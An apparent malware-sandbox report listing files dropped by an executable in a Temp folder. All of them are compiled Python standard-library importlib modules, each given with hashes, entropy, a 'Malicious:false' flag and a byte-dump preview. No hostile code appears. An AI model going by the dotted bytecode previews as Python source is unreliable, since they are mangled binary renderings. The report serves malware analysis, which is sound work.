                                                                                                                                            Preview:...........d...............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoader)...NamespaceLoaderc.....................0.....t...........t...........z...t...........z...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r............YC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\machinery.py..all_suffixesr........s................1C..C..Cr....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\metadata\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):58976
                                                                                                                                            Entropy (8bit):5.210191491663766
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:dNCMr9F8hK/ofx/YcI4NHT/lpybA3yAT5999pKIyC:7Cc9F8wAx/Yx+YA3ym5999YIT
                                                                                                                                            MD5:95A9F502C84B028354B5F667702EED6C
                                                                                                                                            SHA1:865DA10094EC78C9AF116F8A008A0187D03A20BD
                                                                                                                                            SHA-256:25D5C4538147BD61438895D62B0D83EA61059460F3895D095AC0853EFDB1655A
                                                                                                                                            SHA-512:B9F258F18457B29E19A5907C8193BFB7175BE2DA4B75AC265B3EBD83830F9F8B8060EDA415ECBCFBFA4E89B3BD73C7B8C5BA2444FFB7A1A976AA91A7208F8316
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d.}.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l.m#Z#..d.d.l$m%Z%m&Z&m'Z'm(Z(..g.d...Z)..G.d...d.e*..............Z+..G.d...d...............Z,..G.d...d...............Z-..G.d...d.e-..............Z...G.d...d.e/..............Z0..G.d...d.e0..............Z1..G.d...d...............Z2..G.d...d.e2e3..............Z4..G.d...d.e.j5......................Z6..G.d ..d!..............Z7..G.d"..d#..............Z8..G.d$..d%e"..............Z9..G.d&..d'..............Z:..G.d(..d)..............Z;..G.d*..d+..............Z<..G.d,..d-e9..............Z=..G.d...d/e8..............Z>d0..Z?d1..Z@d2e.j.........f.d3..ZAd4..ZB..e.jC........e...e.jD........d5...............6..............ZE..d2e(e1e4f...........f.d7..ZFd8..ZGd9..ZHd2e&eIe%eI..........f...........f.d:..ZJd;..ZKd<..ZLd.S.)=

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\metadata\_adapters.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3839
                                                                                                                                            Entropy (8bit):5.226542067537095
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:oFKJo6j2ZX0JcSNtk5VcFbD9lt0nIQRajWWgMb3FMMlpCxl:eKKUNtMOle2WWHbVMMyxl
                                                                                                                                            MD5:92ECC5125A0B29BDA560C0AFBED60DB0
                                                                                                                                            SHA1:885EE663EDF3DC11620532DE13BECD5C768C84D3
                                                                                                                                            SHA-256:AA9842F1C75516AF8551DC5F0250B0926F8137A72926C4F523404BA00E12B5C5
                                                                                                                                            SHA-512:DD757D87173BAEC4F76D10EECFBFA864002B1B9A322FF7B3BDCE2529DEB9BEDF75445FE6CAE444FE9B969D68ABEF4C316CC58A2860C13B3BEFD1F3614E86E2B2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d..........................Z.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....G.d...d.e.j.........j.......................Z.d.S.)......N.....)...FoldedCasec............................e.Z.d.Z...e...e.e.g.d...............................Z...d.e.j.........j.........f...f.d...Z.d...Z...f.d...Z.d...Z.e.d.................Z...x.Z.S.)...Message)...Classifierz.Obsoletes-Dist..Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-Platform..Dynamic..origc............................t...............................................|...............}.t...........|.....................................t...........|...............................|.S...N)...super..__new__..vars..update)...clsr......res..__class__s.... ..bC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\metadata\_adapters.pyr....z.Message.__new__....s=..........g.g.o.o.c..".."......S.............d......$..$..$..........c.....................8.....|...........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\metadata\_collections.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2186
                                                                                                                                            Entropy (8bit):5.171442448175865
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:Q4l4KOSI06Kjv2Yejb5KxV9L2/HlwpP7HlTHZ:Q/KOSL6Pb5o9CHwzlrZ
                                                                                                                                            MD5:D8EE0A9DD58D395FF568F4D2BD797A31
                                                                                                                                            SHA1:D529ABB66591AE6BF7829453CC860DD025156706
                                                                                                                                            SHA-256:E6E7596DF56B714A71A70B28A35FB24A06706F446332F390A0D1C502658F0C76
                                                                                                                                            SHA-512:6C9435F942C54F71BE9949CF984C6449AD445CE574B03110087A0673287BDE52B208B6748730AC84B4671E8494442A1343342F00D930EA22CE692E002E09F2E1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d..........................n.....d.d.l.Z...G.d...d.e.j.......................Z...G.d...d...e.j.........d.d.............................Z.d.S.)......Nc.....................(.......e.Z.d.Z.d.Z...f.d...Z.d...Z...x.Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c.....................Z.........t...........|.d.t.........................j.......................|...............S.).N.._frozen)...getattr..super..__missing__)...self..key..__class__s.... ..eC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\metadata\_collections.pyr....z FreezableDefaultDict.__missing__....s&........<.w.t.Y.......(;..<..<.S..A..A..A.....c...............................f.d....._.........d.S.).Nc.............

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\metadata\_functools.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3626
                                                                                                                                            Entropy (8bit):5.3566139773320876
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:mbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/yl0:7oOCDUX4sXwjvMXNpa+ZcfSrI6v98pg
                                                                                                                                            MD5:7B72F4FE22C21CC44F1CBE5765F18555
                                                                                                                                            SHA1:253B3F956AEB6E01A3D3A375D3F14A7417FD562C
                                                                                                                                            SHA-256:7E889807ED2832C6E9FA2035A5D1BA522ED96A27E280244418F9E13DE3CF9289
                                                                                                                                            SHA-512:9E0B0A30542DB0A3CD22FE93D32BF5988EA42C76FC4DE6A93A310E48312EC9ED8E4BE7698A895D0599CEFE2921D7C4BCCDB5D5A5A1A8DCC19D101F6F7F340408
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d..........................$.....d.d.l.Z.d.d.l.Z.d.d...Z.d...Z.d.S.)......Nc.....................P...........p.t...........j.............................f.d...}.d...|._.........|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\metadata\_itertools.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2589
                                                                                                                                            Entropy (8bit):5.5227498762027905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:OCEnAQJjfPM82Ea/oW3mtkCzOQVQqtXBcNqo+UEL4cNLNGp:jEAUjsoW36hBnY+UW4CG
                                                                                                                                            MD5:5A2D35A95247A288E1F9D966EB66AE2D
                                                                                                                                            SHA1:CB2A1E092EBCAC68558E19BB5629EEC69F3A300E
                                                                                                                                            SHA-256:71C1C49627614D79B059FBD776BB2C1EDFF0CF8789CE95D686211F25A55C8DCF
                                                                                                                                            SHA-512:B2D7FF0AB819E47EDF6D48AD659A6D04563651D489720A45096C389BDD8A999C7AD041A3AC4935204B181A4FA77A0A8EA65BAB48748067BCE0071A96A83532EA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d].........................(.....d.d.l.m.Z...d.d...Z.e.e.f.f.d...Z.d.S.)......)...filterfalseNc................#........K.....t.........................}.|.j.........}.|..)t...........|.j.........|...............D.].}...|.|.................|.V.......d.S.|.D.] }...|.|...............}.|.|.v.r...|.|.................|.V......!d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seen..seen_add..element..ks.... .cC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\metadata\_itertools.py..unique_everseenr........s................5.5.D....x.H....{..".4.#4.h..?..?...........G....H.W.............M.M.M.M.............. ...........G......G.....A......}.}......................................c...........................|...t...........d...............S.|.. t...........|.|...............r.t...........|.f...............S...t...........|...............S.#.t...........$.r...t...........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\metadata\_meta.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2957
                                                                                                                                            Entropy (8bit):4.948837183851954
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:d3QxEq0+4Z2LbW2kbvBRlviPvG6RPgl9wbOkUTzcDvWOvKrvOMvhNIz7rkEj:d3QxE3D2LbObvLlviPvG69OwbnUTQDvR
                                                                                                                                            MD5:C5C338ACAF49EEFC05407A06453434A1
                                                                                                                                            SHA1:19FF32523A18850CA1FDE20B11597535818A6F09
                                                                                                                                            SHA-256:1169910C621F62D511AEC1A188B41FF0F8FD5B3C3CD823CCF1C3B0B1B545DE6C
                                                                                                                                            SHA-512:307F50C9FEFF8849B869CD8DA53CE59CA8270C461465682099DFF0EA708B80313251731B586D85E89F44ACDFD9928F0560CC12FC37CEC3F57C12593D220B8E4D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d..........................x.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc...........................e.Z.d.Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.e...........f.d...Z.d.d.e.d.e.d.e.e.e...........e.f...........f.d...Z.e.d.e.e.e.e.e.e...........f...........f...........f.d.................Z.d.S.)...PackageMetadata..returnc...........................d.S...N......selfs.... .^C:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\metadata\_meta.py..__len__z.PackageMetadata.__len__.......................itemc...........................d.S.r....r....).r....r....s.... r......__contains__z.PackageMetadata.__contains__....r....r......keyc...........................d.S.r....r....).r....r....s.... r......__getitem__z.PackageMetadata.__getitem__....r....r....c...........................d.S.r....r....r....s.... r..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\metadata\_text.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4384
                                                                                                                                            Entropy (8bit):4.967000876644875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:AOrbGowYRzHinOrIAeQc2br7QmDSBA9fYm27SSpN:AvowCmVAeQH7Qmkk5ySS7
                                                                                                                                            MD5:3CFBA3A96163397F2CF481C8647557D1
                                                                                                                                            SHA1:9084E97BCF9B336D29031D98E83DA70CA668C964
                                                                                                                                            SHA-256:7EF0D54CD83E329FD8E0DB2A6B3EDC29ABEF707923FCFB2395E2A8B9DCDDF777
                                                                                                                                            SHA-512:56C1CB1C3FC395B7529F719D86529BC7DC8D317A20423F1BD0A6A6CE2568F6EF951EFF18CD85438F8DC27C43A6077C29A9312CC11BA61DF68F17BDB0658BF0D2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d..........................6.....d.d.l.Z.d.d.l.m.Z.....G.d...d.e...............Z.d.S.)......N.....)...method_cachec.....................n.......e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z...f.d...Z.d...Z.e...f.d.................Z.d...Z.d.d...Z...x.Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {Folded

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\readers.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):576
                                                                                                                                            Entropy (8bit):5.314481241861224
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:58+/CSBdZ8rUEyqw1zNxQj4gwKJO0UnT8g/2IpWChB3agu/86:/66G4Eyqw1zNxsCKJO1T2Khogud
                                                                                                                                            MD5:73CFA3123027B0203839F1ABBEDFB99C
                                                                                                                                            SHA1:582110CB10CCDB29ADB17D37BACDE874F360340A
                                                                                                                                            SHA-256:9F38E7E268A5E2AAED1D914A3E2799685B84F982C719C08FFC02085EFBE990A5
                                                                                                                                            SHA-512:65AB15091B4B0234F991DF4D313CF37586D245FB967F2059605374AB23F000616D6F36C406E99F180B4A6AA633909224939D3B0F6AFFDD25D545F417C17175C2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dS.........................*.....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.S.).z..Compatibility shim for .resources.readers as found on Python 3.10...Consumers that can rely on Python 3.11 should use the other.module directly.......)...FileReader..ZipReader..MultiplexedPath..NamespaceReaderN)...__doc__..resources.readersr....r....r....r......__all__........WC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\readers.py..<module>r........s]..................................................................................L...K..K......r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\resources\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):821
                                                                                                                                            Entropy (8bit):5.110132518495001
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:i90VYMM6M5myyxOHA842KVa+gFFFFFFFFFFFFFFFFFFK66G9Ht:i9IYN6eyxef42KA+Mt
                                                                                                                                            MD5:5B2822FF9A7A86ECF3310DDD9D13A466
                                                                                                                                            SHA1:11784DAACB22B44652314149ACFE8BFA67DA67F7
                                                                                                                                            SHA-256:68AFBF82E7C2A622846C9ADA85ABC155C3647E73DDB9D297D6D3C9DF0281208C
                                                                                                                                            SHA-512:4BFD23297BBDEA8A668C0E73E304372EEC487772DF6F0F79170E36F4D3826B08D6BC65DC55BBDD41EBB79E3B59252E4344C5701ADC0C0C7FCEAA723E4F732079
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d..........................Z.....d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.S.).z*Read resources contained within a package......)...as_file..files..Package)...contents..open_binary..read_binary..open_text..read_text..is_resource..path..Resource)...ResourceReader).r....r....r....r....r....r....r....r....r....r....r....r....N)...__doc__.._commonr....r....r......_legacyr....r....r....r....r....r....r....r......abcr......__all__........bC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\resources\__init__.py..<module>r........s...........0..0.......................................................................................................................................................... ....................................r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\resources\_adapters.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10738
                                                                                                                                            Entropy (8bit):5.00844222865067
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:kGRjIfuPpeva18iDLG7j9PENgUtXAQGEDL:kGZIfuPYvOQlEGSAQGO
                                                                                                                                            MD5:A41A1F81FEAD6D5AEDF704A02F3EA4E2
                                                                                                                                            SHA1:4CFA01728246D66DEB2CD25CD0C1A50059CA85C5
                                                                                                                                            SHA-256:514F22EA47337C90B6FBA3869E7C6F1BE9F4BB335357BA901DE0FEFEEE5872F0
                                                                                                                                            SHA-512:95192BAFB7F66A528D708E379CDD008C218D25EFC7F1EB7015C69BDBE66F5A4CAA121BDF359F757C449F8DBA8188117FEA8917F08DFE71801CAAB77C4876E902
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dB..............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d...............Z...G.d...d...............Z.d.d...Z...G.d...d...............Z.d...Z.d.S.)......)...suppress)...TextIOWrapper.....)...abcc.....................$.....e.Z.d.Z.d.Z.d...f.d...Z.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c...........................|.j.........S...N)...loader....specs.... .cC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\resources\_adapters.py..<lambda>z.SpecLoaderAdapter.<lambda>....s.......$.+.......c.....................4.....|.|._...........|.|...............|._.........d.S.r....).r....r....)...selfr......adapters.... r......__init__z.SpecLoaderAdapter.__init__....s.................g.d.m.m........r....c.....................,.....t...........|.j.........|...............S.r....)...getattrr......r......names.... r......__getattr__z.SpecLoaderAdapter.__getattr__....s..........t.y.$..'..'..'

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\resources\_common.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4284
                                                                                                                                            Entropy (8bit):5.248608504098041
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:SdJdnxcZLkTv8qUA123IHG+nvVt37Qnvz0RUq:mJQLkTkqUR3IJvb7Qnvz0j
                                                                                                                                            MD5:7C1B6254EF0662E9377A9ECF7A31D19D
                                                                                                                                            SHA1:A03366437FD1CDF6FB4094720197ED681479F654
                                                                                                                                            SHA-256:6643F947D9A4FDBE02EECCECEEF6C5C0BAC0813CFF995E4903146D5535E71D3E
                                                                                                                                            SHA-512:A8721D9814E45BC230F45460632DCC9D4BAB666EE15ABF942FC6EB5F48CDE23A83E1EBA0EE92399C50A69704A7F63896C4E9764A4F76090409844D56B8480602
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d..........................X.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.........e.f...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.e.j.........d.e.j.........d...d.................Z.e.j.........d.................Z.e.......................e.j.......................e.j.........d...............................Z.d.S.)......N)...Union..Optional.....)...ResourceReader..Traversable)...wrap_specc.....................:.....t...........t...........|.............................S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...packages.... .aC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\resources\_common.py..filesr........s..............G..,..,..-..-..-.....c.....................d.....|.j.........}.t...........|.j.........d.d...............}.|...d.S...|.|.j.......................S.).z?. Return the package's loader if it's a ResourceReader.. ..get_res

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\resources\_itertools.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1383
                                                                                                                                            Entropy (8bit):5.441800108443291
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xVR3cYhJ8QbtVw1GCEURc7AQJgyfPjZr2KfH2kuoBLb84eCtaNMUKhhhhF:XqMJ8S41GCEnAQJjfPjZr2KfW/oBkrWp
                                                                                                                                            MD5:AB25D2B38C12824F8362014022ABBD03
                                                                                                                                            SHA1:B74FCC48FC1A14FB9809572D3117ACD2FB5E9DE4
                                                                                                                                            SHA-256:9AAF473C52E864BD86E8A96285CA72FF9DB465031367D5581BA203CA8D6FE029
                                                                                                                                            SHA-512:D65B97BC6BA70504CB0E99949F34B3D92C11759EECEDFFAA48883E1E9A422812CAFA48FDA77D0415FFA85F1F09458CFCA1211AE313719521A32660B462954FB9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d...............Z...e.d...............Z...d.d.e.e...........d.e.e.e.g.e.f.....................d.e.e...........f.d...Z.d.S.)......)...filterfalse)...Callable..Iterable..Iterator..Optional..Set..TypeVar..Union.._T.._UN..iterable..key..returnc................#........K.....t.........................}.|.j.........}.|..)t...........|.j.........|...............D.].}...|.|.................|.V.......d.S.|.D.] }...|.|...............}.|.|.v.r...|.|.................|.V......!d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__).r....r......seen..seen_add..element..ks.... .dC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\importlib\resources\_itertools.py..unique_everseenr........s............. #.u.u.D....x.H....{..".4.#4.h..?..?...........G....H.W.............M.M.M.M.............. ...........G......G.....A......}.}......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\resources\_legacy.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6481
                                                                                                                                            Entropy (8bit):5.30381923445766
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tf9mI69trOYksdi+DJpmxuF9fgb4BYe+YqjBf1l2H12TDU:tf9W9tqYxd1dsxuAUAuwfU
                                                                                                                                            MD5:193F37194AE388626A4F107C71E2853C
                                                                                                                                            SHA1:E9F630538AF2C7AA3C557D0EBDB0DDB35FA09F48
                                                                                                                                            SHA-256:6D89A0588BFA5E17A0A44AEA8F10C2B6E152F171D8FE4765B6342120F93C93C0
                                                                                                                                            SHA-512:824D5CE297CE7BC19237F4254E75497A1FA928CC508177AF11A6A3410E27764E6016C56B0962B6FD1B97A0AD3E555AF670CD7B7E8581A613E5A15F9037217014
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.e.j.........e.f...........Z.e.Z.d...Z.d...Z.e.d.e.d.e.d.e.f.d.................Z.e.d.e.d.e.d.e.f.d.................Z.e.....d.d.e.d.e.d.e.d.e.d.e.f.d.................Z.e.....d.d.e.d.e.d.e.d.e.d.e.f.d.................Z.e.d.e.d.e.e...........f.d.................Z.e.d.e.d.e.d.e.f.d.................Z.e.d.e.d.e.d.e.e.j...................f.d.................Z.d.S.)......N)...Union..Iterable..ContextManager..BinaryIO..TextIO..Any.....)..._commonc.....................F.......t...........j...........................f.d.................}.|.S.).Nc.....................\.......t...........j...........j...........d...t...........d.......................|.i.|.....S.).Nz. is deprecated. Use files() instead. Refer to https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy for migration advice......)...stacklevel)...warnings..warn..__name__..Deprec

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\resources\abc.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8545
                                                                                                                                            Entropy (8bit):5.131832439585791
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:+sOSHGDtBzoIandyTcN3FHZ0RJj2q4iFt:+pRtBz9czCpTt
                                                                                                                                            MD5:BEB2DCCBDE5872A02F7C9561052DD1DD
                                                                                                                                            SHA1:4490D8EB74C3203EF35A45184198A4CA0F4AD641
                                                                                                                                            SHA-256:D7A311A9D4F0DA649EDF0CAE8E7AFDE48FA771391D7B3CBE2B4EB7CF515620FB
                                                                                                                                            SHA-512:BAF0F510A2B8435C7FF68B704A7F8485F00A0AF8CA1B52ECB2D41610443CA4955B3DE333A43ABBE039813CD419AAC7A5A3013CB299E0729D44CBB1D1448C786B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........dr...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.e.j.........e...........f...........Z.g.d...Z...G.d...d.e.j.........................Z.e...G.d...d.e.............................Z...G.d...d.e...............Z.d.S.)......N)...Any..BinaryIO..Iterable..Iterator..NoReturn..Text..Optional)...runtime_checkable..Protocol)...Union)...ResourceReader..Traversable..TraversableResourcesc...........................e.Z.d.Z.d.Z.e.j.........d.e.d.e.f.d.................Z.e.j.........d.e.d.e.f.d.................Z.e.j.........d.e.d.e.f.d.................Z.e.j.........d.e.e...........f.d.................Z.d.S.).r....zDAbstract base class for loaders to provide resource reading support...resource..returnc...........................t.............).z.Return an opened, file-like object for binary reading... The 'resource' argument is expected to represent only a file name.. If the resource cannot be found, FileN

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\importlib\resources\readers.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8344
                                                                                                                                            Entropy (8bit):4.983084761149986
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:KsG35Ak0Xj+r2I77kuuSHd//fWJ6usbaFRhkJ86H6D6b66z5CCQ:C5uXo2au26D6O6z0
                                                                                                                                            MD5:65F992F7E6A18B1B685234621B5583A3
                                                                                                                                            SHA1:05FDAD41F2E0B19A961F3811C31BE0DA9241B477
                                                                                                                                            SHA-256:C1DB2FB32FB8D10550378162C2B419DF9B12071A4FEB7B5C9615D0E7A77F1F13
                                                                                                                                            SHA-512:2F84F592CB5BCFDB0A07F749C8D46AD602E27C63C89607B672D79A1AAE0D5CCD1DA81AC310D613F6306DC65FD53E08B28E48D15021A52BE0BE66BD5FC5721B16
                                                                                                                                            Malicious:false
